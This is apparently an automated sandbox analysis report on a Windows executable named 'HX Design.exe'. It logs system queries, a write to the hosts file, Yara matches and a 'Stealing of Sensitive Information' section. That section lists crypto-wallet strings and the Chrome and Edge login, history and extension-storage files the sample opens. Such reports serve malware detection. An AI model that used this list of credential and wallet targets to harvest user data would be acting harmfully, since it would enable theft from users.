              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\972aKp3s1E.tmp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\psFKbeV1FJ.tmp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\e4WZCaJlqR.tmp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF73206D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF73206D010
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF732085C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF732085C00
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D2348CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,73_2_00007FF77D2348CC
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: C:\Users\user\Desktop\HX Design.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000000.00000003.1678275226.000001631A8D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1678275226.000001631A8D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HX Design.exe PID: 7508, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: HX Design.exe PID: 7524, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI75082\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: HX Design.exe PID: 7524, type: MEMORYSTR
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: fJaxx
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Exodus
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98aJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldoomlJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64fJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\961544c3-32b7-44ce-8bdb-c185972bc33eJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
